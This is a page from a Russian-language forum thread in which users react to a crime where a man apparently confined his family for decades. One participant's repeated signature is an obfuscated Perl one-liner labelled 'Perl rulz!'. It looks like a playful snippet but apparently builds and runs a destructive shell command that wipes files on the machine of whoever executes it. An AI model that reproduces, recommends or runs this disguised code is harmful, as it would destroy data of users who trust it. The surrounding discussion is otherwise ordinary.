ебануться..... ты же в питере? _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
вот тебе и бандитский петербург блин...(
да, грустно, что мы живем в таком мире, где у людей не хватает мозгов _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
да.всё таки люди какие то неправильные существа.грустно,противно.и ничего не поделаешь.такие люди как тот мужик стопудово психически нездоровы,как маньяки,вот так вроде нормальный отец семейства и тп,а на самом деле такой урод.фу. _________________ Freedom's just another word for nothin' left to lose.
где у людей не хватает ни мозгов, ни чести, ни совести, ни других крайне призрачных для них понятий и определений. грустно, действительно. _________________ не стоит относиться к этой жизни серьёзно,
всё равно живым вам из неё не выбраться
ну...люди ведь не все такие.есть еще Люди с большой буквы.есть.
но всё мельчает и все мельчают.и ничего с этим не поделаешь. _________________ Freedom's just another word for nothin' left to lose.
да уж...как вообще такое им в глову могло прийти...вот кстати часто слышала ,что маньяки и тп с виду приличные люди,тихие такие...что на них никто бы и не подумал _________________ "We accept her! We accept her! One of us! One of us! Gooble gobble, gooble gobble!"
например я тоже могу многим "наормальным" показаться извращенцем, но мне хватает мозгов извращаться до той степени чтобы устраивала меня и тех кого касается, остальных же это не касается
в данном же вышеописанном случае человек решал судьбу других людей против их воли, что в данном случае главное
другое дело если бы она сама не хотела на улицу выходить
тут еще меня лично что больше всего поразило и взбесило, как это было годами спланировано, и за 30 (!!!) лет никто не догадался
хотя у меня была мысль.... может ктото и догодался... и один из детей на самом деле его.... ну вы поняли.... _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
а кто из нас может дефинировать эти слова? никто... и это нормально... потомучто у каждого человека имеют право быть свои понятия об этих вещах,.... так что решающими являются все-таки мозги...
я вот щас пишу и сам вижу что мое увлечение сатанизмом за последние несколько лет довольно сильно отразилось на моем характере и манере мышления, как я считаю в лучшую сторону _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Kill Me
ну, допустим, какойто сосед догадывался, ему предложили молчать, и вместо похода в полицию поучаствовать во "всеобщем заговоре" с еблей и всеми вытекающими _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Часовой пояс: GMT + 4 На страницу Пред.1, 2, 3След.
Страница 2 из 3